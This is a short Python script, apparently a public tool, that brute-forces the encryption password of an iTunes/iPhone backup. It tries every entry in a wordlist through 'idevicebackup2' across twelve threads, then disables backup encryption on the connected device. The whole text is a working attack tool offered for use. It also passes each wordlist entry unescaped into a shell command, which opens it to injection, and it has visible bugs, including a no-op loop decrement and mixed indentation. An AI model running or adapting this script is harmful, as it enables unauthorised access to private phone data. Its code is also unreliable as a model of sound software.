bruteforce iTunes backup encryption password with dictionary attack

bfEnc.py

#
# bfEnc.py - bruteforce iTunes backup encryption password with dictionary attack
#
# to use, plug in device with encryption turned on and let this program run
#
# (c)dayt0n 2018
#

import os
import sys
import subprocess
import threading
import time

threadCount = 12 # you can adjust this number depending on how robust your computer is

count = 0
end = False
finalPass = ""

def breakEncryption(passwords,start,stop):
	for i in range(start,stop):
		global end
		if not end:
			global count
			count += 1
			proc = os.popen("idevicebackup2 encryption off --password \"" + str(passwords[i]) + "\"").read()
			if "Invalid password" not in proc and "Could not start service com.apple.mobilebackup2" not in proc and proc != "\n" and proc != "":
				print("Password was %s, turning off encryption." % passwords[i])
				print(proc)
				print(".")
				global finalPass
				finalPass = passwords[i]
				end = True
				break
			elif "Could not start service com.apple.mobilebackup2" in proc or proc == "\n" or proc == "":
				i -= 1
				count -= 1
		else:
			break

if len(sys.argv) < 2:
	print("Incorrect usage\nusage: %s [password_list]" % sys.argv[0])
	exit(-1)
passList = sys.argv[1]
print("Reading %s..." % passList)
with open(passList) as f:
	passwords = f.readlines()
passwords = [x.strip() for x in passwords]
for i in range(1,(threadCount+1)):
	print("starting thread %d" % i)
	firstNum = (len(passwords)/threadCount) * (i - 1)
	secondNum = (len(passwords)/threadCount) * i
	t = threading.Thread(target=breakEncryption,args=(passwords,firstNum,secondNum))
	t.daemon = True
	t.start()

while not end:
	subprocess.call(["clear"])
	print("iTunes encryption password bruteforce in progress...")
	print("attempt %d/%d" % (count,len(passwords)))
  time.sleep(.5)
print("Password was %s, but I turned off encryption for you." % finalPass)